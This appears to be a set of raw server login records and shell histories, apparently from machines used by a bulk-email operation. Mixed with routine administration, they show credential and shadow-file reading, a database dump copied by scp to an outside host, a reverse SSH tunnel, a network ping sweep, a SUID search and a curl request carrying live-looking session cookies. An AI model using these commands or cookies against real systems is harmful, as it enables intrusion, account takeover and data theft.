admin   pts/1      :1              Fri Oct 21 09:45 - 07:18 (41+22:33)
admin   pts/0      :1              Fri Oct 21 09:44 - 07:43 (41+22:59)
admin   pts/0      66.165.231.123  Tue Oct 11 12:54 - 10:38  (21:43)
admin   pts/0      :1              Tue Oct 11 12:09 - 12:10  (00:00)
(unknown :0        :0              Tue Oct 11 12:09 - 07:43 (51+20:34)
reboot  system boot 3.10.0-327.36.1. Tue Oct 11 12:08 - 07:43 (51+20:34)
```

```
admin   pts/0    66.165.231.121   Tue Oct 11 11:53 - 12:07  (00:13)
(unknown :0      :0         Tue Oct 11 11:46 - 12:07  (00:21)
reboot  system boot 3.10.0-327.36.1. Tue Oct 11 11:45 - 12:07  (00:21)
root    pts/0    66.165.231.121   Tue Oct 11 11:06 - down   (00:02)
(unknown :0      :0         Tue Oct 11 11:02 - 11:08  (00:06)
reboot  system boot 3.10.0-327.36.1. Tue Oct 11 12:24 - 11:08  (-1:-15)
admin   :0       :0         Tue Oct 11 12:08 - 12:23  (00:14)
(unknown :0      :0         Tue Oct 11 12:07 - 12:08  (00:00)
root    pts/0    66.165.231.121   Tue Oct 11 11:50 - crash  (00:33)
reboot  system boot 3.10.0-327.el7.x Tue Oct 11 11:44 - 11:08  (00:-35)

66.165.231.80
 880  scp -Cr ./* john@54.67.124.187:/mnt/tmp/xr/
 881  exit
 882  cd /
 883  cd /root
 884  ls -la
 885  cat ./commands.txt
 886  cat ./.my.cnf
 887  ls -la
 888  cat ./.bash_history
 889  cd /home
 890  ls
 891  cd xr
 892  ls -la
 893  cd for-tony
 894  ls
 895  ls -la
 896  cat mxleads-hurricane-dicksmasher.php
 897  cd ..
 898  ls
 899  scp -Cr ./* john@54.67.124.187:/mnt/tmp/xr/
 900  sudo su
 901  scp -Cr ./* john@54.67.124.187:/mnt/tmp/xr/
 902  ls
 903  cd ..
 904  ls
 905  cd ..
 906  ls
 907  cd vroot
 908  ls
 909  cd ..
 910  cd tmp
 911  ls
 912  cd ..
 913  cd var
 914  ls
 915  cd ..
 916  mysql -uroot -p
 917  cd tmp
 918  mysql -uroot -p
 919  mysqldump -uroot -p pdns > ./pdns.sql
 920  ls
```

```
921  ls -la
922  head -50 ./pdns.sql
923  cat ./pdns.sql
924  rm ./pdns.sql
925  ls
926  cd ..
927  ls
928  cd var
929  ls
930  cd tmp
931  ls
932  cd ..
933  cd opt
934  ls
935  cd ..
936  cd ..
937  ls
938  cd sbin
939  ls
940  cd /lib
941  ls
942  cd ..
943  ls
944  cd usr
945  ls
946  cd lib
947  ls
948  cd /
949  ls
950  cd home
951  cd xr
952  ls -la
953  cd ..
954  ls
955  cd ..
956  ls
957  cd lib64
958  ls
959  cd ..
960  ls
961  cd opt
962  ls
963  cd ..
964  cd mnt
965  ls
966  cd ..
967  cd root
968  ls
969  cd ..
970  ls
971  cd var
972  cd logs
973  ls
```

```
 974  cd log
 975  ls
 976  head -25 ./secure
 977  cd squid
 978  ls
 979  cat -25 ./access.log
 980  head -25 ./access.log
 981  ls -l
 982  head -25 ./cache.log
 983  cd /etc
 984  ls
 985  cat ./hostname
 986  cat ./shadow
 987  cd pdns
 988  ls
 989  cat ./pdns.conf
 990  ls
 991  ls -l
 992  cat ./pdns_mysql.sql
 993  scp -C ./* john@54.67.124.187:/mnt/tmp/pdns/
 994  ls
 995  cd ..
 996  ls
 997  cat ./lftp.conf
 998  exit
 999  hisotry
1000  exit
1001  history
```

```
66.165.231.67
 727  ssh -N -T -R 22222:127.0.0.1:22 root@104.200.154.101
```

```
 1  yum update -y
 2  echo 'admin ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers
 3  useradd admin
 4  passwd admin
 5  vi /etc/ssh/sshd_config
 6  service sshd reload
 7  firewall-cmd --permanent --remove-service=dhcpv6-client
 8  firewall-cmd --permanent --add-service=ssh
 9  firewall-cmd --permanent --add-port=10050/tcp
10  systemctl reload firewalld
11  echo 'root: tech@rivercitymediaonline.com' >> /etc/aliases
12  newaliases
13  sed -i 's/enforcing$/permissive/' /etc/selinux/config
14  setenforce 0
15  yum install epel-release
16  rpm --import http://apt.sw.be/RPM-GPG-KEY.dag.txt
17  rpm -ivh http://pkgs.repoforge.org/rpmforge-release/rpmforge-release-0.5.3-1.el7.rf.x86_64.rpm
18  yum install deltarpm
19  for i in /etc/pki/rpm-gpg/RPM-GPG-KEY-*; do rpm --import $i; done
20  yum clean all
21  yum update
```

22   yum install rsync mlocate ntpdate gcc-c++ patch readline-devel zlib-devel libyaml-devel libffi-devel openssl-devel make
autoconf automake libtool bison perl-DBI perl-DBD-MySQL perl-Digest-SHA perl-ExtUtils-ParseXS perl-devel perl-CPAN rsyslog
lftp telnet zabbix20-agent cronie denyhosts unix2dos dos2unix man psutils yum-cron bc
23  systemctl start denyhosts
24  systemctl enable denyhosts
25  updatedb
26  vi /etc/rsyslog.conf
27  service rsyslog restart
28  vi /etc/ntp.conf
29  systemctl enable ntpdate
30  systemctl start ntpdate
31  systemctl enable crond
32  systemctl start crond
33  reboot
34  yum update -y
35  df -H
36  free -g
37  exit
38  df -H
39  history
40  vi /etc/hostname
41  vi /etc/zabbix_agentd.conf
42  systemctl enable zabbix-agent
43  systemctl start zabbix-agent
44  yum groupinstall "Server with GUI"
45  systemctl set-default graphical.target
46  systemctl start graphical.target
47  yum install -y tigervnc-server
48  cp /lib/systemd/system/vncserver@.service /etc/systemd/system/vncserver@:1.service
49  vi /etc/systemd/system/vncserver@:1.service
50  firewall-cmd --permanent --zone=public --add-service vnc-server
51  firewall-cmd --reload
52  su - admin
53  systemctl daemon-reload
54  systemctl enable vncserver@:1.service
55  systemctl start vncserver@:1.service
56  cd /etc/yum.repos.d
57  wget http://download.virtualbox.org/virtualbox/rpm/rhel/virtualbox.repo
58  yum --enablerepo rpmforge install dkms
59  yum groupinstall "Development Tools"
60  yum install kernel-devel
61  yum install VirtualBox-5.0
62  usermod -a -G vboxusers admin
63  yum update -y
64  reboot
65  vi /etc/sysconfig/network-scripts/ifcfg-eno1
66  reboot
67  mkdir /images
68  chown admin:admin /images
69  ls -ll /images/
70  ls -ll /images
71  cd /images/
72  ls

```
73  ls -ll
74  exit
75  exit
76  service deny.hosts status
77  history
78  service deny.hosts start
79  systemctl enable deny.hosts
80  systemctl enable denyhosts
81  systemctl start denyhosts
82  yum clean all
83  yum update
84  cd /etc/yum.repos.d/
85  ls
86  cat CentOS-Base.repo
87  ls
88  cat CentOS-CR.repo
89  ls
90  cat CentOS-Debuginfo.repo
91  cat CentOS-fasttrack.repo
92  cat CentOS-Sources.repo
93  cat CentOS-Vault.repo
94  cd
95  cat /etc/resolv.conf
96  exit
97  procinfo
98  /proc/cpuinfo
99  less /proc/cpuinfo
100  !
101  cat /proc/cpuinfo | grep 'core id'
102  cat /proc/meminfo
103  free -g
104  dmesg | grep mem
105  dmesg | grep Kingston
106  dmesg | grep G
107  dmesg | grep ram
108  dmesg | grep -i memory
109  dmesg | grep -i kingston
110  dmesg | grep -i micron
111  dmesg | grep -i crucial
112  dmesg | grep -i asus
113  dmesg | grep -i super
114  dmesg | grep -i mhz
115  dmesg | grep -i ddr
116  dmesg | grep -i ddr3
117  dmesg | grep -i non
118  dmesg | grep -i ecc
119  uptime
120  fdisk -l
121  df -H
122  du -sh /images/
123  df -h
124  yum install mdadm
125  mdadm -E /dev/sd[b-c]
```

```
126  mdadm --zero-superblock /dev/sdb
127  ls /dev
128  mdadm --zero-superblock /dev/sdb1
129  fdisk -l /dev/sdb
130  fdisk -l /dev/sdc
131  mdadm -E /dev/sd[b-c]
132  fdisk /dev/sdb
133  fdisk /dev/sdc
134  mdadm -E /dev/sd[b-c]
135  mdadm --create /dev/md0 --level=mirror --raid-devices=2 /dev/sd[b-c]1
136  cat /proc/mdstat
137  mdadm -E /dev/sd[b-c]1
138  mdadm --detail /dev/md0
139  mkfs.ext4 /dev/md0
140  ls /
141  ls /mnt/
142  mkdir /mnt/raid1
143  mount /dev/md0 /mnt/raid1/
144  df -h
145  touch /mnt/raid1/somefile
146  cat > /mnt/raid1/somefile
147  cat /mnt/raid1/somefile
148  rm /mnt/raid1/somefile
149  ll /mnt/raid1/somefile
150  ll /mnt/raid1/
151  cat /proc/mdstat
152  vim /etc/fstab
153  mount -av
154  mdadm --detail --scan --verbose >> /etc/mdadm.conf
155  cat /etc/mdadm.conf
156  mdadm --detail /dev/md0
157  mkdir /mnt/raid1/images
158  chown -R admin: /mnt/raid1/images
159  ll /mnt/raid1/images
160  ll /mnt/raid1/
161  ll /images/
162  mv /images/LiveFeed /mnt/raid1/images/
163  ls /images/
164  ls /mnt/raid1/images/
165  ll /mnt/raid1/images/
166  rmdir /images/
167  ln -s /mnt/raid1/images/ /images
168  ll
169  ll /
170  chown --help
171  chown -h admin: /images/
172  ll
173  ll /
174  cd /images
175  ll
176  df -h
177  uname -m
178  exit
```

```
179  tail /var/log/messages
180  vim /var/log/messages
181  setenforce 0
182  cd /var/log
183  ls
184  df -h
185  /home/admin/bin/dropbox.py status
186  ps fax
187  service dropbox status
188  service dropbox stop
189  service dropbox status
190  exit
191  service dropbox start
192  ps fax
193  exit
194  tail /var/log/audit/audit.log
195  tail -F /var/log/messages
196  grep zabbix_agentd /var/log/audit/audit.log | audit2allow -M mypol
197  semodule -i mypol.pp
198  tail -F /var/log/messages
199  exit
200  service tiger-vnc status
201  firewall-cmd --permanent --zone=public --add-service vnc-server
202  firewall-cmd --reload
203  systemctl enable vncserver@:1.service
204  systemctl start vncserver@:1.service
205  systemctl set-default graphical.target
206  reboot
207  vi /etc/rsyncd.conf
208  mount
209  df -h
210  vi /etc/rsyncd.conf
211  systemctl restart rsyncd
212  tail /var/log/messages
213  firewall-cmd --list-all
214  firewall-cmd --permanent --add-service=rsyncd
215  firewall-cmd --reload
216  firewall-cmd --list-all
217  cd /home/admin
218  ls
219  cd Dropbox/
220  ls
221  ls -l
222  ls
223  pwd
224  cd campaigns/
225  cd phprefer
226  ls
227  cd scripts
228  ls
229  ls -l
230  cat rsync_campaigns.rb
231  df -h
```

```
232  ls /mnt/raid1
233  tail /var/log/messages
234  getenforce
235  tail /var/log/messages
236  restorecon -v '.dropbox'
237  restorecon -v /home/admin/Dropbox/.dropbox
238  tail -f /var/log/messages
239  cat /etc/selinux/config
240  cd /etc/sysconfig/network-scripts/-s
241  cd /etc/sysconfig/network-scripts/
242  ls
243  cat ifcfg-eno2
244  ping 10.16.32.1
245  vi ifcfg-eno2
246  service network restart
247  ping 10.16.32.1
248  exit
249  grep rsync /var/log/audit/audit.log | audit2allow -M mypol
250  ls
251  semodule -i mypol.pp
252  ip addr
253  cd /images/Internal-FTP/
254  ls
255  exit
256  systemctl enable rsyncd
257  systemctl start rsyncd
258  rsync -av --delete /mnt/raid1/External_FTP/ "10.16.32.239::backups/Dropbox/External_FTP" --dry-run
259  ip addr
260  nmtui
261  ip up eno2
262  ip link en02
263  ip link eno2
264  ip addr
265  ip link set eno2 up
266  ip addr
267  dmesg
268  tail /var/log/messages
269  date
270  tail /var/log/messages
271  ip addr
272  ping 10.16.32.66
273  rsync -av --delete /mnt/raid1/External_FTP/ "10.16.32.239::backups/Dropbox/External_FTP" --dry-run
274  rsync -av --delete /home/admin/Dropbox/ "10.16.32.239::backups/Dropbox/Dropbox"; rsync -av --delete
     /mnt/raid1/Internal_FTP/ "10.16.32.239::backups/Dropbox/Internal_FTP" --dry-run
275  rsync -av --delete --exclude=.dropbox.cache /home/admin/Dropbox/ "10.16.32.239::backups/Dropbox/Dropbox" --dry-
     run; rsync -av --delete --exclude=.dropbox.cache /mnt/raid1/Internal_FTP/ "10.16.32.239::backups/Dropbox/Internal_FTP" --dry-
276  rsync -av --delete --exclude=.dropbox.cache /home/admin/Dropbox/ "10.16.32.239::backups/Dropbox/Dropbox" --dry-
277  vi /etc/crontab
278  ls
279  cd /saved/or
280  cd /saved
281  ls
282  w
```

```
283  cd /home/admin/
284  ls
285  locate FTPRoot
286  cd Dropbox
287  cd FTPRoot
288  cd Lists
289  ls
290  ls  | grep S7VS
291  for i in *S7VS*; do ls -l $i; done
292  for i in *S7VS*; do rm -rf $i; done
293  ls -l
294  pwd
295  df -h
296  cd /var/www/li
297  cd /home/admin/
298  ls
299  cd Dropbox
300  ls
301  ls -l
302  du -h campaigns
303  ls -ltr
304  rm campaigns.tgz
305  tar cvzf campaigns.tgz campaigns
306  ls -l
307  scp campaigns.tgz root@103.22.161.2:
308  ls
309  mv campaigns.tgz /home/admin
310  cd /home/admin
311  ls
312  ls -l
313  chown admin:admin campaigns.tgz
314  cd /home/admin/Dropbox/
315  ls
316  cd FTPRoot
317  ls
318  pwd
319  cd Users
320  cd ..
321  ls -l
322  cd ..
323  ls
324  ls -l
325  locate External_FTP
326  cd Dropbox
327  ls
328  ls -l
329  ls FTPRoot
330  ls
331  updatedb
332  locate External
333  cat /etc/crontab
334  cd /mnt/raid1
335  ls
```

```
336  cd External_FTP/
337  ls
338  ls -l
339  cd Users
340  cd ..
341  cd Internal_FTP/
342  cd Useres
343  cd Users
344  cd Mike
345  du -h .
346  du -h --max-depth=1 .
347  ls from.steve
348  rm -rf from.steve AOL\ New\ Data\ 10.23.12 Lifetime\ Lists Mike\ New\ Source\ Files Master\ Lists
349  ls -l
350  du -h .
351  cd /mnt/raid1
352  ls
353  cd Internal_FTP/
354  ls
355  cd Users
356  du -h Tony
357  ls
358  du -h tony
359  du -h mike
360  du -h Mike
361  cd Mike
362  ls -l
363  rm -rf C3 CyntrixWork/ FBLS Hotmail\ Opt\ In\ Compare Verify\ Gmail\ 18-Million.invalid2.* missingOPTin smsoptin t1
364  du -h .
365  ls -l
366  cat /etc/redhat-release
367  exit
368  reboot
369  cd /var/www/lig
370  locate campaigns
371  cd /home/admin/Dropbox/campaigns
372  ls
373  ls -l
374  mv rcm_index.php rcm_index.php.disabled
375  mv index.htm index.htm.disabled
376  grep init.php *
377  ls -l *.php
378  for i in *.php; do
379  vi resetcache
380  vi resetcache.php
381  ls -l
382  for a in *.php; do mv $a $a.disabled; done
383  vi /etc/crontab
384  history
385  service tiger-vnc status
386  systemctl status vncserver@1.service
387  ps fax
388  ps fax | grep xvnc
```

```
389  systemctl start vncserver@1.service
390  journalctl -xe
391  grep zabbix_agentd /var/log/audit/audit.log | audit2allow -M mypol
392  semodule -i mypol.pp
393  systemctl start vncserver@1.service
394  systemctl status vncserver@1.service
395  journalctl -xe
396  exit
397  df -h
398  cd /
399  du -h --max-depth=1 .
400  cd mnt
401  du -h .
402  df -h
403  ls
404  cd raid1/
405  ls
406  du -h --max-depth=1 .
407  ls images
408  du -h images/DB-LL-Test/
409  df -h
410  fdisk -l
411  df -H
412  exit
413  cd /var/log
414  ls -ltr
415  du -h --max-depth=1 .
416  cd ..
417  df -h
418  cd /
419  du -h --max-depth=1 .
420  df -h /home
421  cd /home
422  du -h --max-depth=1 .
423  cd admin/
424  du -h --max-depth=1 .
425  cd Dropbox
426  du -h --max-depth=1 .
427  cd FTPRoot/
428  du -h --max-depth=1 .
429  cd Lists
430  du -h --max-depth=1 .
431  cd 365days/
432  ls
433  du -h --max-depth=1 .
434  cd Cloudmark/
435  du -h --max-depth=1 .
436  cd Locations/
437  ls -ltr
438  ls -ltr | more
439  ps auxwww | grep Dropbo
440  cat /etc/crontab
441  ls
```

```
442  ls -l | more
443  cd ..
444  find . -name 20160*.zip
445  find . -name 20160[1-6].zip
446  find . -name 201601.zip
447  find . -name 20160[1-6]*.zip
448  find . -name 20160[1-6]*.zip -delete
449  df -h
450  cd ..
451  find . -name 20160[1-6]*.zip -delete
452  find . -name 20160[1-6]*.zip
453  df -h
454  df -H
455  cd /
456  ls
457  cd ~/Dropbox
458  exit
459  cd /home/admin
460  ls
461  ls -l
462  cd Dropbox
463  ls
464  ls -l
465  du -h campaign
466  du -h campaigns
467  find campaigns
468  find campaigns -type f | wc -l
469  cd /
470  ls
471  ls -l
472  ps auxwww | grep FTP
473  cd /home/admin/Dropbox/Dropbox
474  cd /home/admin
475  ls
476  cd Public
477  ls
478  cd ..
479  find . -name Internal_FTP
480  find . -name Internal
481  cd /mnt/raid1
482  ls
483  cd Internal_FTP/
484  ls
485  ls -l
486  cd Uesrs
487  cd Users
488  ls
489  du -h Alvin-OLD
490  ls -l Alvin-OLD | wc -l
491  cd Alvin-Old
492  cd Alvin-OLD/
493  find .
494  find . | more
```

```
495 find . | wc -l
496 du -h --max-depth=1 .
497 du -h --max-depth=1 . | grep G
498 ls YahooBulk
499 ls YahooBulk/
500 vi /etc/ssh/sshd_config
501 systemctl reload sshd
502 cd /home/admin/
503 ls
504 cd Dropbox/
505 ls
506 cd FTPRoot
507 ls
508 ls -l
509 cd ..
510 locate External_FTP
511 ls
512 pwd
513 locate Alvin
514 cd /mnt/raid1/Internal_FTP/
515 ls
516 cd Users
517 locate xmailer
518 locate wordlist
519 cp /home/admin/Dropbox/FTPRoot/xmailer.zip ~
520 ls
521 unzip xmailer.zip
522 cd xmailer/
523 ls
524 ls -l
525 cat wordslist.txt
526 exit
527 ls
528 cat mypol.pp
529 cat initial-setup-ks.cfg
530 ls
531 cd /home
532 ls
533 cd admin
534 ls
535 cd downloads
536 ls
537 cd Downloads
538 ls
539 cd ..
540 cd bin
541 ls
542 cd ..
543 cd Pictures
544 ls
545 cd /
546 ls
547 cd opt
```

```
548  ls
549  cd rh
550  ls
551  cd /tmp
552  ls
553  xwin --help
554  cat /home/admin/.bash_history
555  cat /root/.bash_history
556  cd /
557  ls
558  cd mnt
559  ls
560  cd raid1
561  ls
562  cd Internal_FTP
563  ls
564  cd Users
565  ls
566  ls -la
567  cat "accounts 9.2.txt"
568  ls
569  cd Alvin
570  ls
571  cd Yahoo
572  ls
573  cd ..
574  ls
575  cd Jim
576  cd ..
577  cd Jim
578  ls
579  cd Accounts
580  ls
581  cd ..
582  cd "server transer"
583  ls
584  cd ..
585  cd
586  ls
587  cd
588  cd /
589  cd
590  cd /
591  ls
592  cd opt
593  ls
594  cd /var
595  ls
596  cd opt
597  ls
598  cd ..
599  cd log
600  ls
```

```
601  cd samba
602  ls
603  cd old
604  ls
605  cd ..
606  cd pluto
607  ls
608  cd peer
609  ls
610  cd ..
611  cd sa
612  ls
613  ls -la
614  cat sa01
615  cd ..
616  ls
617  ls -la
618  head -25 maillog-20170109
619  head -100 maillog-20170109
620  ssh admin@vHost01
621  ssh admin@vHost01.localdomain
622  netstat -l
623  telnet localhost 37116
624  ping 10.16.32.75
625  ping 10.16.32.80
626  ping 10.16.32.240
627  ssh admin@10.16.32.240
628  ping 10.16.32.254
629  ping 10.16.32.250
630  ping 10.0.32.14
631  ping 10.0.0.14
632  ping 10.16.32.64
633  ping 10.16.32.90
634  ping 10.16.32.95
635  ping 10.16.32.100
636  nmap --help
637  fping
638  for i in {1..254}; do ping -c 1 10.16.32.0.$i | grep 'from'; done
639  for i in {1..254}; do ping -c 1 10.16.32.$i | grep 'from'; done
640  ssh admin@10.16.32.1
641  ssh -vvv admin@10.16.32.1
642  ssh -vvvvvvvv admin@10.16.32.1
643  ssh -vvvvvvvv admin@10.16.32.21
644  ssh -vvvvvvvv admin@10.16.32.91
645  ssh -vvvvvvvv admin@10.16.32.92
646  ssh -vvvvvvvv admin@10.16.32.96
647  ssh -vvvvvvvv admin@10.16.32.97
648  ssh -vvvvvvvv admin@10.16.32.123
649  ssh -vvvvvvvv admin@10.16.32.180
650  ssh admin@serverhub001
651  cat /etc/resolv.conf
652  ping vHost69
653  ssh admin@vHost66
```

```
654  exit
655  ls
656  cd /home/admin/.vnc
657  ls
658  cat passwd
659  cat xstartup
660  ./xstartup
661  cat ./vHost67\:1.log
662  ping 172.245.173.133:
663  ping 172.245.173.133
664  ssh -vvvv admin@172.245.173.133:
665  ssh -vvvv admin@172.245.173.133
666  ls
667  ssh admin@10.16.32.69
668  echo $DISPLAY
669  xterm
670  cat ./.esd_auth
671  cd Public
672  ls
673  cd /
674  ls
675  cat /home/admin/.viminfo
676  vncviewer
677  vnc
678  tightvnc
679  cd /root
680  ls
681  cat mypol.pp
682  cat mypol.te
683  locate rhosts
684  find / -perm -4000
685  cd /dev
686  ls
687  cd mnt
688  ls
689  cd /mnt
690  ls
691  cd raid1
692  ls
693  cd ..
694  mount -o ro, /dev/sdc /mnt/2
695  mkdir 2
696  mount -o ro, /dev/sdc /mnt/2
697  mount -o ro, /dev/sdc1 /mnt/2
698  mount -o ro, /dev/sdb1 /mnt/2
699  mount -o ro, /dev/sdb /mnt/2
700  mount -o ro, /dev/sda3 /mnt/2
701  mount -o ro, /dev/sda2 /mnt/2
702  mount -o ro, /dev/sda1 /mnt/2
703  mount -o ro, /dev/sda /mnt/2
704  mount -o ro, /dev/md0 /mnt/2
705  ls
706  rm -rf ./2
```

```
707  ls
708  cd ..
709  ls
710  cd tmp
711  ls
712  cd ssh-QHxt1AziEksA/
713  ls
714  cat agent.653
715  ls
716  ls -la
717  locate vnc
718  Xvnc
719  DISPLAY=:0 /bin/bash
720  ls
721  cat ./mypol.pp
722  cd xmailer
723  ls
724  ls -la
725  cat ipsettings.xmr
726  ssh admin@104.200.154.101
727  ssh -N -T -R 22222:127.0.0.1:22 root@104.200.154.101


--------------------------------------------------------
66.165.231.123
--------------------------------------------------------

cat known_hosts
ssh -i "/home/tunnel/.ssh/id_rsa" tunnel@66.165.231.50
cd /root
ls
ls -la
cat ./somefile
ssh admin@66.165.231.50
ls
cd /home
ls
cd images
ls
cd /home/tunnel
ls
ls -la
cd ./.ssh
ls
nautilus
exit
nautilus
tcpdump -q
who
ssh -v admin@159.118.139.12
ssh -v admin@66.165.247.21
ls -la
mysql -uroot -p
mysql -uroot
```

```
cd /etc
ls
cat ./my.cnf
cd /home/admin
ls
ls -la
cd mnt
ls
cd ..
mount -a
mount
cd Dropbox
ls
cd /root
ls -la
cd /home/admin/Dropbox
ls
ls -la
cd RVR_INTEL
ls
ls -la
head -50 mac_fuckery.txt
cat bot-guard-protection-b64.txt
cat rsa2.key
cat mac-me.txt
ls
ls -la
cd ..
ls
cd RVR_INTEL
cd ..
ls -la
cd RVR_INTEL
ls
cd ..
ls -la
cd RVR_INTEL
ls
cd Mac_Me_iCloud/
ls -la
cd ..
ls
cd ..
ls
cd mailing
ls
ls -la
cd ..
ls
cd tmp
ls
cd ..
ls
```

```
netstat -l
netstat
tcpdump
cd usr
cd /
cd usr
ls
cd local
ls
cd share
ls
cd info
ls
cd ..
cd lib
ls
cd ..
cd lib
ls
cd ..
cd etc
ls
cd ..
ls
cd src
ls
cd ..
ls
cd src
ls
cd ..
cd tmp
ls
cd ..
ls
cd /var
ls
cd local
ls
cd ..
cd www
ls
cd /
ls
cd home
ls
cd /home/admin
ls
cd src
ls
cd tunnels
ls
cd ..
```

```
cd hackershit
ls
ls -la
head -50 ./casus_shell-decoded.php
cd ..
ls
cd /usr
cd local
cd src
ls
cd /home/admin
ls
cd mnt
ls
cd ..
cd tmp
ls
la -la
ls -la
cat ips.txt
ls -la
cd ..
ls -la
cat ./.mysql_history
```

curl

'https://smallbusiness.yahoo.com/catalogmgr/product/_module/?ysbparams=eyJhcHBpZCI6ImNhdGFsb2ctbWFuYWdlciIsImJpzemlkIjoieXMtMTQxNDE0ODMyMjY2MzM0IiwiYml6dXJsIjoiaHR0cDovL3lzLTE0MTQxNDgzMjI2NjMzNC55YWhvb3N0b3JlLmNvbVsImNvbSSIsmxhbmciOiJlbi11cyJ9&crumb=Ia1Y0v2rr.E&action=get_products&sortby=update_time&sortorder=asc&rowsperpage=10&startrow=1&endrow=-1' -H 'Pragma: no-cache' -H 'Accept-Encoding: gzip, deflate, sdch' -H 'Accept-Language: en-US,en;q=0.8' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36' -H 'Accept: */*' -H 'Referer: https://smallbusiness.yahoo.com/catalogmgr/product/?bizid=ys-141414832266334&ysbparams=eyJhcHBpZCI6ImNhdGFsb2ctbWFuYWdlciIsImJpzemlkIjoieXMtMTQxNDE0ODMyMjY2MzM0IiwiYml6dXJsIjoiaHR0cDovL3lzLTE0MTQxNDgzMjI2NjMzNC55YWhvb3N0b3JlLmNvbVsImxhbmciOiJlbi11cyJ9&yid=all.fishing&appid=catalog-manager&bizurl=http%253A%252F%252Fys-141414832266334.yahoostore.com&lang=en-us&timestamp=1442001878.453&signature=0b91286217608d9e3109241342630756089b4258' -H 'X-Requested-With: XMLHttpRequest' -H 'Cookie: AO=u=1; YLS=v=1&p=1&n=1;
V=v=0.7&m=0&ccOptions=%7B%22show%22%3Afalse%2C%22lang%22%3A%22en%22%2C%22fontSize%22%3A24%2C%22fontName%22%3A%22Helvetica%20Neue%2CHelvetica%2CArial%2C_sans%22%2C%22fontColor%22%3A%22%23ffffff%22%2C%22fontOpacity%22%3A1%2C%22fontEffect%22%3A%22none%22%2C%22bgColor%22%3A%22%23000000%22%2C%22bgOpacity%22%3A%22%3A0.75%7D; DSS=ts=1431018180&cnt=3&sdts=1427424544881&sdtp=spigot-chr-gcmac;
AMCV_att1=MCAID%7C2AA9C9D7851D3067-4000012B201A3ACB; ucs=tr=1432222051494&fs=1;
YM=v=2&u=SuKlu5evhFLZE6vragJCSenS2XK_2EQKYe_JNQ--&d=&f=AAA&t=8h9YVB&s=j2Rw;
DK=v=2&p=OHwyMzMwfFZpcnR1YWx8RGVza3RvcCBCcm93c2VyfG1hYyByvcyB4fDEwLjjEw;
ywandp=1000896321451%3A4224888094; fpc=1000896321451%3AZTEq1Wub%7C%7C;
s_pers=%20s_vnum%3D1441080000741%2526vn%253D1%7C1441080000741%3B%20s_nr%3D1440460369199-Repeat%7C1443052369199%3B%20s_invisit%3Dtrue%7C1440462169202%3B%20s_lv%3D1440460369204%7C1535068369204%3B%20s_lv_s%3DMore%2520than%25207%2520days%7C1440462169204%3B%20gpv_v17%3Dnet%257Catt.yahoo%257Cdesktop%7C1440462169207%3B; tos_viewed=1; HP=0; tos_accepted=1; ypcdb=754828f019b314d467f9f3e5596c5793;
tokenid=ordering31441998634824-844998769148792750;
U=mt=ieGMxp2MhY9nP6tlqYu_weTrpH4i3uHqcohzeWIc&ux=fey8VB&un=amu33bs01s2sj; _vpx=6kVifdgn8uMn;
B=abgutrdagpf7v&b=4&d=c2Ay33NpYEJwUzhtvG0yV_cjhA_5lSko2FJbPA--&s=k1&i=I4U2pr4bFbDFP4Nvn4gg;
F=a=1qs_uzgMvSxk_G2ju88xwaC8L_aaxocyqtD0oItHRopEH1I1rdqhGB7JG_WQRgmLlHsWD_4Ui7WOu4VWdazazKRceXjZ33N4BPyGSDvyhWeWDKGEKmV3xz6Um.cZCn.EB4Q0SbLl5fOttPaEzoydfpGDYNhCH71t2EZ5&b=lIM4; PH=fn=kfUKyottRVR994SR&i=us;
SSL=v=1&s=hH8gm8fpn2fI6uAQ4JntDyxHb.fmk_BDQVAuq_HQXnKL6bEHajmyAQTGpGN541jpAYWhx9ZhFobLuXznlq0A9A--&kv=0;
T=z=a8y8VBaQaBWBpuriVomSohsNjM1MwY2TjY1MzAzNk4x&a=YAE&sk=DAAoVzxqy/Hx8r&ks=EAAzCeB6iJy0oipGDBBLRlgqA--~E&d=z~wBTVRRoHERRYhPVEVETkRiME1Uа7IBYQF7QUUB7~EKSklJUlpCHEhGRE+PSiVRT1Y2HE1NWERPTOE=X2lkAYhfx=V0WEN

ls -la
cd ./.ssh
ls
cat authorized_keys
cd /root
ls
ls -la
cd ./.ssh
ls
cd /
ls
cd /root
ls
ls -la
cat somefile
who
ls -la
cd /
ls
locate xr
cd /usr

```
ls
cd src
ls
cd ..
cd local
ls
cd src
ls
cd ..
cd share
ls
cd man
ls
cd /
ls
cd home
ls
cd steve
ls
cd ..
cd michelle
ls
ls -la
cd ..
ls -la
cd lost+found/
ls
ls -la
cd ..
cd images
ls
ls -la
cd /root
ls
cd ./.ssh
ls
cat known_hosts
ssh admin@66.165.231.238
ssh -v admin@66.165.231.50
firefox
google-chrome
tor
cd /sbin
ls
cryptsetup
cryptsetup --usage
ssh admin@66.165.231.50
ls
./mount.ntfs-3g -a
./mount.ntfs-3g /dev/sda2 /mnt
./mount.ntfs-3g /dev/sda1 /mnt
./mount.ntfs-3g /dev/sda /mnt
./mount.ntfs-3g /dev/sr0 /mnt
```

```
ls /dev
./mount.ntfs-3g /dev/sdb /mnt
./mount.ntfs-3g /dev/sdb1 /mnt
./mount.ntfs-3g /dev/sdb2 /mnt
./mount.ntfs-3g /dev/sdb1 /mnt
fuser
fuser -c
fuser -l
fuser -c /dev/sdb1
fuser /dev/sdb1
fuser /dev/sdb2
fuser /dev/sdb
fuser -m /dev/sdb
fuser -m /dev/sdb2
fuser -m /dev/sdb1
fuser 80
fuser -v -m /dev/sdb1
fuser -v -k /dev/sdb1
./mount.ntfs-3g /dev/sdb1 /mnt
mount /dev/sdb1 /mnt
cd /mnt
ls
umount /mnt
cd ..
umount /mnt
mount /dev/sdb /mnt
mount.ntfs-3g /dev/sdb /mnt
mount.ntfs-3g /dev/sdb2 /mnt
mount /dev/sdb2 /mnt
lv
lvm
sysroot /dev/root
lvm
ls -la
cd mnt
ls
cd ..
cd /
ls
cd tmp
ls
ls -la
cat binarylogs.sql
locate xr
find xr
cd /usr
ls
cd local
ls
cd src
ls
cd ..
ls
```

```
cd etc
ls
cd sbin
ls
cd ..
cd sbin
ls
cd ..
cd ..
cd /
cryptmount
cm
cd /root
ls
cd /admin
cd /home
ls
cd admin
cat ./.bash_history
ssh admin@return2school.net
cat ./.bash_history
ssh admin@66.165.231.54
ssh admin@66.165.231.41
ls
cd /root
ls
ls -la
locate
proctor
ssh -v admin@c21hand.com
